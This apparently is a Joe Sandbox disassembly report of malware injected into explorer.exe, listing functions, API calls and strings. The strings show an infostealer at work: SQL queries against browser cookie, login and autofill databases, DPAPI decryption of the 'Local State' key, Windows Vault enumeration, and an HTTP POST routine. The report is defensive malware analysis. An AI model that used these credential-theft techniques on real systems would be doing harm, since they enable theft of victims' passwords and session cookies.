28217 c1011 3 API calls 28216->28217 28217->28220 28218 c1011 GetProcessHeap HeapFree VirtualQuery 28218->28220 28220->28213 28220->28214 28220->28218 28221 c17c0 9 API calls 28220->28221 28222 c1000 GetProcessHeap RtlAllocateHeap 28220->28222 28223 c1fce GetProcessHeap HeapFree VirtualQuery CryptUnprotectData RtlMoveMemory 28220->28223 28221->28220 28222->28216 28223->28220 28537 cebd9 24 API calls 28425 113dc8 24 API calls 28428 cc9ea _allmul _alldiv 28431 c99e1 strncmp 28432 cb1e3 23 API calls 28540 e7be1 29 API calls 28233 c47fa 28240 c479c 28233->28240 28236 c479c 23 API calls 28237 c4813 28236->28237 28238 c479c 23 API calls 28237->28238 28239 c481f 28238->28239 28241 c1afe 10 API calls 28240->28241 28242 c47af 28241->28242 28243 c47f1 28242->28243 28244 c199d 9 API calls 28242->28244 28243->28236 28245 c47bf 28244->28245 28246 c47ea 28245->28246 28248 c1d4a 18 API calls 28245->28248 28247 c1011 3 API calls 28246->28247 28247->28243 28248->28245 28433 1155eb IsProcessorFeaturePresent 28434 cd1f7 memset _allmul _allmul 28435 c49f1 13 API calls 28543 e13ca 62 API calls 28544 d9ff0 32 API calls

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph for function 000C3717 (rendered basic-block graph; node/edge list not reproduced here)
                                                      APIs
                                                        • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                        • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                      • GetTempPathW.KERNEL32(00000104,00000000), ref: 000C3778
                                                      • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 000C3782
                                                      • DeleteFileW.KERNELBASE(00000000), ref: 000C3789
                                                      • CopyFileW.KERNEL32(?,00000000,00000000), ref: 000C3794
                                                      • RtlCompareMemory.NTDLL(00000000,?,00000003), ref: 000C383B
                                                      • RtlZeroMemory.NTDLL(?,00000040), ref: 000C3870
                                                      • lstrlen.KERNEL32(?,?,?,?,?), ref: 000C398B
                                                      • lstrlen.KERNEL32(00000000), ref: 000C399A
                                                      • wsprintfA.USER32 ref: 000C39F1
                                                      • lstrlen.KERNEL32(00000000,?,?), ref: 000C39FD
                                                      • lstrcat.KERNEL32(00000000,?), ref: 000C3A21
                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000C3A49
                                                      • lstrlen.KERNEL32(?,00000000,00000000,00000000,00000000), ref: 000C3B13
                                                      • lstrlen.KERNEL32(00000000), ref: 000C3B22
                                                      • wsprintfA.USER32 ref: 000C3B79
                                                      • lstrlen.KERNEL32(00000000), ref: 000C3B85
                                                      • lstrcat.KERNEL32(00000000,?), ref: 000C3BA9
                                                      • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 000C3BDA
                                                      • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 000C3C16
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$File$DeleteMemoryTemplstrcatwsprintf$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                      • String ID: %sTRUE%s%s%s%s%s$0$COOKIES$FALSE$SELECT host_key,path,is_secure,name,encrypted_value FROM cookies$TRUE$v1
                                                      • API String ID: 584740257-404540950
                                                      • Opcode ID: a23d138301e79af16bee3357f0eaa08dc63fc4c2289d2a28b577019bb06831f8
                                                      • Instruction ID: c2bd5664ae81c03ce275280e3603a140813cffa0008f9f19c02a5d8c1c7d7917
                                                      • Opcode Fuzzy Hash: a23d138301e79af16bee3357f0eaa08dc63fc4c2289d2a28b577019bb06831f8
                                                      • Instruction Fuzzy Hash: 40E19870218341AFD725DF24C984FAFBBE9AF89344F04882CF585862A2DB76CD45CB52

                                                      Control-flow Graph

                                                      control_flow_graph for function 000C2198 (rendered basic-block graph; node/edge list not reproduced here)
                                                      APIs
                                                      • RtlZeroMemory.NTDLL(?,00000114), ref: 000C21AF
                                                      • GetVersionExW.KERNEL32(?), ref: 000C21BE
                                                      • LoadLibraryW.KERNEL32(vaultcli.dll), ref: 000C21E8
                                                      • GetProcAddress.KERNEL32(00000000,VaultOpenVault), ref: 000C220A
                                                      • GetProcAddress.KERNEL32(00000000,VaultCloseVault), ref: 000C2214
                                                      • GetProcAddress.KERNEL32(00000000,VaultEnumerateItems), ref: 000C2220
                                                      • GetProcAddress.KERNEL32(00000000,VaultGetItem), ref: 000C222A
                                                      • GetProcAddress.KERNEL32(00000000,VaultFree), ref: 000C2236
                                                      • RtlCompareMemory.NTDLL(?,00121110,00000010), ref: 000C22E8
                                                      • RtlCompareMemory.NTDLL(?,00121110,00000010), ref: 000C236C
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                      • StrStrIW.SHLWAPI(?,Internet Explorer), ref: 000C23FE
                                                      • FreeLibrary.KERNELBASE(00000000), ref: 000C2493
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$Memory$CompareLibrarylstrcatlstrlen$FreeLoadVersionZero
                                                      • String ID: Internet Explorer$VaultCloseVault$VaultEnumerateItems$VaultFree$VaultGetItem$VaultOpenVault$vaultcli.dll
                                                      • API String ID: 2583887280-2831467701
                                                      • Opcode ID: a5e802d1ad2f9820106049f403d1fd165f228156d15865eec1ed5e2a83c9e588
                                                      • Instruction ID: 494c01f336fce24a4fdd702bd81126ed0909a159fbcac44f9df4693bfcb951b3
                                                      • Opcode Fuzzy Hash: a5e802d1ad2f9820106049f403d1fd165f228156d15865eec1ed5e2a83c9e588
                                                      • Instruction Fuzzy Hash: 00919B71A083049FD718DF65C884FAFBBEAAF98304F00882DF98597252EB71D841CB52

                                                      Control-flow Graph

                                                      control_flow_graph for function 000C3098 (rendered basic-block graph; node/edge list not reproduced here)
                                                      APIs
                                                        • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                        • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                      • GetTempPathW.KERNEL32(00000104,00000000), ref: 000C30F9
                                                      • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 000C3103
                                                      • DeleteFileW.KERNELBASE(00000000), ref: 000C310A
                                                      • CopyFileW.KERNEL32(?,00000000,00000000), ref: 000C3115
                                                      • RtlCompareMemory.NTDLL(00000000,00000000,00000003), ref: 000C31A4
                                                      • RtlZeroMemory.NTDLL(?,00000040), ref: 000C31D7
                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000C32DF
                                                      • DeleteFileW.KERNELBASE(00000000,00000000,?), ref: 000C339C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$DeleteMemoryTemp$CloseCompareCopyCreateCryptDataHandleNamePathUnprotectZero
                                                      • String ID: 0$@$SELECT origin_url,username_value,password_value FROM logins$v1
                                                      • API String ID: 2757140130-4052020286
                                                      • Opcode ID: 9b5e622c8af8dc7c20ce1d0d89dc6463935831b3a1ebc8c8ffe9238c8f9a14fd
                                                      • Instruction ID: 7d893e13d2ced862851d02a0f1a8131389b44376dc6ecc335188d734be133e5c
                                                      • Opcode Fuzzy Hash: 9b5e622c8af8dc7c20ce1d0d89dc6463935831b3a1ebc8c8ffe9238c8f9a14fd
                                                      • Instruction Fuzzy Hash: C2919A31218381ABDB149F24C844FAFBBE9AFC5744F04892CF58596292DB35DE45CB52

Control-flow Graph
Control-flow graph (rendered as an image; node and edge data omitted): function 000C3ED9 to 000C3FDB.
                                                      APIs
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      • PathCombineW.SHLWAPI(00000000,00000000,*.*), ref: 000C3F0A
                                                      • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 000C3F16
                                                      • lstrcmpiW.KERNEL32(?,001162CC), ref: 000C3F38
                                                      • lstrcmpiW.KERNEL32(?,001162D0), ref: 000C3F4C
                                                      • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 000C3F69
                                                      • lstrcmpiW.KERNEL32(?,Local State), ref: 000C3F7E
                                                      • PathCombineW.SHLWAPI(00000000,00000000,?), ref: 000C3F9B
                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 000C3FB5
                                                      • FindClose.KERNELBASE(00000000), ref: 000C3FC4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CombineFindPathlstrcmpi$FileHeap$AllocateCloseFirstNextProcess
                                                      • String ID: *.*$Local State
                                                      • API String ID: 3923353463-3324723383
                                                      • Opcode ID: ab88cef545f067dfd720b654878eacb926dbb06126caee591de0847e53fa4195
                                                      • Instruction ID: 426f7e9a24056e881f0cc7fd89408b911b13c3a2952814074d4836fd1ca5a86e
                                                      • Opcode Fuzzy Hash: ab88cef545f067dfd720b654878eacb926dbb06126caee591de0847e53fa4195
                                                      • Instruction Fuzzy Hash: 6121B0306003447BD758AB709C48FEF76BC9BC6341F14893DF816C2193EBBA8A898661

Control-flow Graph
Control-flow graph (rendered as an image; node and edge data omitted): function 000C1D4A to 000C1EBE.
                                                      APIs
                                                        • Part of subcall function 000C19B4: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2CAF,00000000,00000000,?,?,00000000,PathToExe,00000000,00000000), ref: 000C19C4
                                                      • FindFirstFileW.KERNELBASE(00000000,?,?,00000000), ref: 000C1DA9
                                                      • lstrcmpiW.KERNEL32(?,001162CC), ref: 000C1DCF
                                                      • lstrcmpiW.KERNEL32(?,001162D0), ref: 000C1DE7
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 000C1E62
                                                        • Part of subcall function 000C1CF7: lstrlenW.KERNEL32(00000000,00000000,00000000,000C2C27), ref: 000C1D02
                                                        • Part of subcall function 000C1CF7: RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 000C1D0D
                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 000C1E94
                                                      • FindClose.KERNELBASE(00000000), ref: 000C1EA3
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(?,00000000,00000000,?,?,000C2F0C), ref: 000C1973
                                                        • Part of subcall function 000C1953: lstrlenW.KERNEL32(00116564,?,?,000C2F0C), ref: 000C1978
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,?), ref: 000C1990
                                                        • Part of subcall function 000C1953: lstrcatW.KERNEL32(00000000,00116564), ref: 000C1994
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$Findlstrcmpi$Filelstrcat$CloseComputeCrc32FirstNext
                                                      • String ID: *.*$\*.*
                                                      • API String ID: 232625764-1692270452
                                                      • Opcode ID: 73d8dc3d6c0756faaac33e2ea4124b07e13a18aa3c3ad6d5eea046e5b962ee9e
                                                      • Instruction ID: 18202571e4568279dd00b231e5bad336ff062d80cfc7ef8d9098c242816cd79d
                                                      • Opcode Fuzzy Hash: 73d8dc3d6c0756faaac33e2ea4124b07e13a18aa3c3ad6d5eea046e5b962ee9e
                                                      • Instruction Fuzzy Hash: A931A2307083419BDB64EB749998FEF76EA9FC6340F004A2DF84AC2253EB758C459652

Control-flow Graph
Control-flow graph (rendered as an image; node and edge data omitted): function 000C3E04 to 000C3ED8.
                                                      APIs
                                                        • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                        • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                        • Part of subcall function 000C1C31: CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000C1C46
                                                        • Part of subcall function 000C1C31: GetFileSize.KERNEL32(00000000,00000000,00000000,?,000C3FA8), ref: 000C1C56
                                                        • Part of subcall function 000C1C31: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000C1C76
                                                        • Part of subcall function 000C1C31: CloseHandle.KERNEL32(00000000), ref: 000C1C91
                                                        • Part of subcall function 000C2FB1: StrStrIA.SHLWAPI(00000000,"encrypted_key":"), ref: 000C2FC1
                                                        • Part of subcall function 000C2FB1: lstrlen.KERNEL32("encrypted_key":",?,000C3FA8), ref: 000C2FCE
                                                        • Part of subcall function 000C2FB1: StrStrIA.SHLWAPI("encrypted_key":",0011692C), ref: 000C2FDD
                                                        • Part of subcall function 000C123B: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,000C3E4B,00000000), ref: 000C124A
                                                        • Part of subcall function 000C123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 000C1268
                                                        • Part of subcall function 000C123B: CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 000C1295
                                                      • RtlCompareMemory.NTDLL(00000000,IDPAP,00000005), ref: 000C3E74
                                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000C3E9E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$Crypt$BinaryCloseCreateHandleStringlstrlen$CompareDataMemoryReadSizeUnprotect
                                                      • String ID: $DPAP$DPAP$IDPAP
                                                      • API String ID: 3076719866-957854035
                                                      • Opcode ID: a9c82f26caf97995f8626c96db9c6bf7fa19aba58068d31497b6a4d2f78f6b2d
                                                      • Instruction ID: 1247902a791fece0136aa602f9ff097b9321c40bf4286bc784f5f2b7437e54bc
                                                      • Opcode Fuzzy Hash: a9c82f26caf97995f8626c96db9c6bf7fa19aba58068d31497b6a4d2f78f6b2d
                                                      • Instruction Fuzzy Hash: 9D2181726143456BD725EB688C80FFFB2EDAB95700F44492DF841C7282EB74CE498796

Control-flow Graph
Control-flow graph (rendered as an image; node and edge data omitted): function 00129247 to 0012958D. No API list is given for this function; the graph's own nodes show calls to LoadLibraryA and GetProcAddress in a resolution loop and two VirtualProtect calls near its end.
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.0000000000127000.00000040.80000000.00040000.00000000.sdmp, Offset: 00127000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_127000_explorer.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bc7a8811aa7ef5604bc7b11fca259b6a22483fba2416c80796d7c4e5311e3372
                                                      • Instruction ID: f8f956276b81556480b3c1b19405860d93c04e5a3b5c81f61446289dd2956c78
                                                      • Opcode Fuzzy Hash: bc7a8811aa7ef5604bc7b11fca259b6a22483fba2416c80796d7c4e5311e3372
                                                      • Instruction Fuzzy Hash: 6BA15AB2A143A25FDB259E7CEDD06A07BA0FB52324F2D066DC5D1CB2C2E7605817C751
                                                      APIs
                                                        • Part of subcall function 000C1162: VirtualQuery.KERNEL32(?,?,0000001C), ref: 000C116F
                                                      • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 000C4BB6
                                                      • NtUnmapViewOfSection.NTDLL(000000FF), ref: 000C4BBF
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: MemoryMoveQuerySectionUnmapViewVirtual
                                                      • String ID:
                                                      • API String ID: 1675517319-0
                                                      • Opcode ID: 943dd28f87efffe5f8b9d8f090f8e32d6a59e4bb418e9047c1b4c3c806bb293b
                                                      • Instruction ID: da5cb47bbe52387c3e0a1681ea9d7598d9257fffee12612a3050b05896cbbd2f
                                                      • Opcode Fuzzy Hash: 943dd28f87efffe5f8b9d8f090f8e32d6a59e4bb418e9047c1b4c3c806bb293b
                                                      • Instruction Fuzzy Hash: 35E048319052106BC758BB70BD69FDF3B99AF96361F20C91DB26592492CB36CC818660
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocateProcess
                                                      • String ID:
                                                      • API String ID: 1357844191-0
                                                      • Opcode ID: f72606e3c0e245de1ac5a4330d0ddf5cb12277e236aa42a92db5c9bf23566a34
                                                      • Instruction ID: e0211589613c60c02250040143a06265190b4a18b4b9426254d9e333ec9573f1
                                                      • Opcode Fuzzy Hash: f72606e3c0e245de1ac5a4330d0ddf5cb12277e236aa42a92db5c9bf23566a34
                                                      • Instruction Fuzzy Hash: 93A002755511047BDD4857A49F0DA5A3528F7C4702F108544714586451DAA55444C721
                                                      APIs
                                                      • GetSystemInfo.KERNELBASE(001220A4,00000001,00000000,0000000A,00113127,000C28DA,00000000,?), ref: 000CBFFC
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: InfoSystem
                                                      • String ID:
                                                      • API String ID: 31276548-0
                                                      • Opcode ID: 2bdd03f9feea4e02901fdc3fc3d187381d3a9339238f7048150a26f38f3ba999
                                                      • Instruction ID: 133605fa1fdf14a26a9ee541db0d16855689646c758a655b25552749d386d937
                                                      • Opcode Fuzzy Hash: 2bdd03f9feea4e02901fdc3fc3d187381d3a9339238f7048150a26f38f3ba999
                                                      • Instruction Fuzzy Hash: 53E0E53178475076E63077B87C47F9E25855BE0B10F704A6DFA10A91CBDFA781A11026

Control-flow Graph
Control-flow graph (rendered as an image; node and edge data omitted): function 000C3C40 to 000C3E01.
                                                      APIs
                                                        • Part of subcall function 000C1B6A: CreateFileW.KERNELBASE(00000000,00000080,00000000,00000000,00000003,00000000,00000000), ref: 000C1B82
                                                        • Part of subcall function 000C1B6A: CloseHandle.KERNEL32(00000000), ref: 000C1B8F
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      • GetTempPathW.KERNEL32(00000104,00000000), ref: 000C3C6A
                                                      • GetTempFileNameW.KERNELBASE(00000000,00000000,00000000,00000000), ref: 000C3C76
                                                      • DeleteFileW.KERNEL32(00000000), ref: 000C3C7D
                                                      • CopyFileW.KERNEL32(?,00000000,00000000), ref: 000C3C89
                                                      • lstrlen.KERNEL32(00000000,?,?,?,?,00000000,00000000,?), ref: 000C3D2F
                                                      • lstrlen.KERNEL32(00000000), ref: 000C3D36
                                                      • wsprintfA.USER32 ref: 000C3D55
                                                      • lstrlen.KERNEL32(00000000), ref: 000C3D61
                                                      • lstrcat.KERNEL32(00000000,?), ref: 000C3D89
                                                      • lstrlen.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 000C3DB2
                                                      • DeleteFileW.KERNEL32(00000000,00000000,?), ref: 000C3DED
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: File$lstrlen$DeleteHeapTemp$AllocateCloseCopyCreateHandleNamePathProcesslstrcatwsprintf
                                                      • String ID: %s = %s$AUTOFILL$SELECT name,value FROM autofill
                                                      • API String ID: 2923052733-3488123210
                                                      • Opcode ID: 9fe7b3af864eb22a5069aa5cb1d3fec9ace8dfd2889d23c556998eae091e8bc9
                                                      • Instruction ID: c2bcd80db5c543a617e39dcba95eaf11e028253eaeca6157dfbb761b291e7096
                                                      • Opcode Fuzzy Hash: 9fe7b3af864eb22a5069aa5cb1d3fec9ace8dfd2889d23c556998eae091e8bc9
                                                      • Instruction Fuzzy Hash: 0C418030614341ABD715AB74DC85FBF7AE9AF8A744F00882CF846A7253DB36DD428762

Control-flow Graph
Control-flow graph (rendered as an image; node and edge data omitted): function 000C1333 to 000C15DA.
                                                      APIs
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                        • Part of subcall function 000C106C: lstrlen.KERNEL32(003AB176,00000000,00000000,00000000,000C1366,75712B62,003AB176,00000000), ref: 000C1074
                                                        • Part of subcall function 000C106C: MultiByteToWideChar.KERNEL32(00000000,00000000,003AB176,00000001,00000000,00000000), ref: 000C1086
                                                        • Part of subcall function 000C12A3: RtlZeroMemory.NTDLL(?,00000018), ref: 000C12B5
                                                      • RtlZeroMemory.NTDLL(?,0000003C), ref: 000C13C2
                                                      • wsprintfW.USER32 ref: 000C14B5
                                                      • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 000C1594
                                                      Strings
                                                      • Content-Type: application/x-www-form-urlencoded, xrefs: 000C14FB
                                                      • Accept: */*Referer: %S, xrefs: 000C14AF
                                                      • POST, xrefs: 000C1465
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                      • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                      • API String ID: 3833683434-704803497
                                                      • Opcode ID: f75c3f53a8a409527eaab55de5ea5bf56e7f89f3ed84d96b06d9f90bf4f99658
                                                      • Instruction ID: 1a514e9f141677b8d8d38dac0240c6b57a8f42db93c0a9cec2361f5d12bb06ef
                                                      • Opcode Fuzzy Hash: f75c3f53a8a409527eaab55de5ea5bf56e7f89f3ed84d96b06d9f90bf4f99658
                                                      • Instruction Fuzzy Hash: 4D7155B0608341AFD7549F28DC84EAFBBE9EB89344F10492DF955C3252DB71D9448B92

                                                      Control-flow Graph (rendered graph not recoverable from text)
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: memcpy$FileReadmemset
                                                      • String ID: winRead
                                                      • API String ID: 2051157613-2759563040
                                                      • Opcode ID: 69bd8d8050483ac35828ca10b4e696c3b4e703440bfbec3ff2a071d762c3194d
                                                      • Instruction ID: ae3c229cc1cd92f986aedc8d904385eedd01eb6e8154fd3d065f857c3eb1b8d8
                                                      • Opcode Fuzzy Hash: 69bd8d8050483ac35828ca10b4e696c3b4e703440bfbec3ff2a071d762c3194d
                                                      • Instruction Fuzzy Hash: 0B316872709248ABC794DF58CC85E9F77E6EFC9318F845928F88587211D670EC458B93

                                                      Control-flow Graph (rendered graph not recoverable from text)
                                                      APIs
                                                      • StrStrIW.SHLWAPI(?,?), ref: 000C2E4B
                                                      • RegOpenKeyExW.KERNEL32(?,?,00000000,00020119,?), ref: 000C2EE4
                                                      • RegEnumKeyExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 000C2F54
                                                      • RegCloseKey.KERNEL32(?), ref: 000C2F62
                                                        • Part of subcall function 000C19E5: RegOpenKeyExW.KERNEL32(?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A1E
                                                        • Part of subcall function 000C19E5: RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A3C
                                                        • Part of subcall function 000C19E5: RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000,-00000201,?,?,00000016), ref: 000C1A75
                                                        • Part of subcall function 000C19E5: RegCloseKey.ADVAPI32(?,?,?,00000000,-00000201,?,?,00000016,?,?,?,?,000C1AE2,PortNumber,00000000,00000000), ref: 000C1A98
                                                        • Part of subcall function 000C1BC5: lstrlenW.KERNEL32(00000000,00000000,?,000C2E75,PathToExe,00000000,00000000), ref: 000C1BCC
                                                        • Part of subcall function 000C1BC5: StrStrIW.SHLWAPI(00000000,.exe), ref: 000C1BF0
                                                        • Part of subcall function 000C1BC5: StrRChrIW.SHLWAPI(00000000,00000000,0000005C), ref: 000C1C05
                                                        • Part of subcall function 000C1BC5: lstrlenW.KERNEL32(00000000,?,000C2E75,PathToExe,00000000,00000000), ref: 000C1C1C
                                                        • Part of subcall function 000C1AFE: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,00000000), ref: 000C1B16
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: CloseOpenQueryValuelstrlen$EnumFolderPath
                                                      • String ID: PathToExe
                                                      • API String ID: 1799103994-1982016430
                                                      • Opcode ID: 3b1411a72cbd69e8bd35b9cd1a5aa96c1a9a2e93368d237d97e67d5290b58f5f
                                                      • Instruction ID: 26ee18a0ffe83efa59e30f6cb19543e95d49437544527146fba7fe573bb1303b
                                                      • Opcode Fuzzy Hash: 3b1411a72cbd69e8bd35b9cd1a5aa96c1a9a2e93368d237d97e67d5290b58f5f
                                                      • Instruction Fuzzy Hash: E2318B31604211AF8B19AF218C15EEF7AEAEFC9350F00852CF85997252EE75CD42DBA1

                                                      Control-flow Graph (rendered graph not recoverable from text)
                                                      APIs
                                                        • Part of subcall function 000C1000: GetProcessHeap.KERNEL32(00000008,?,000C11C7,?,?,00000001,00000000,?), ref: 000C1003
                                                        • Part of subcall function 000C1000: RtlAllocateHeap.NTDLL(00000000), ref: 000C100A
                                                      • wsprintfW.USER32 ref: 000C4AA2
                                                      • RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 000C4AC7
                                                      • RegCloseKey.ADVAPI32(?), ref: 000C4AD4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000013.00000002.431607105.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 000C1000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_19_2_c1000_explorer.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocateCloseCreateProcesswsprintf
                                                      • String ID: %s\%08x$Software
                                                      • API String ID: 1800864259-1658101971
                                                      • Opcode ID: 00f92a919fe58cc2fcee024e23b5a8a25c02dcf311696da2a4ef3e62040a607d
                                                      • Instruction ID: d5e9b7e6a79eb13147b6ce8ff60bd94faf68ea9827fa1ea85af36e1d1f0cb5ef
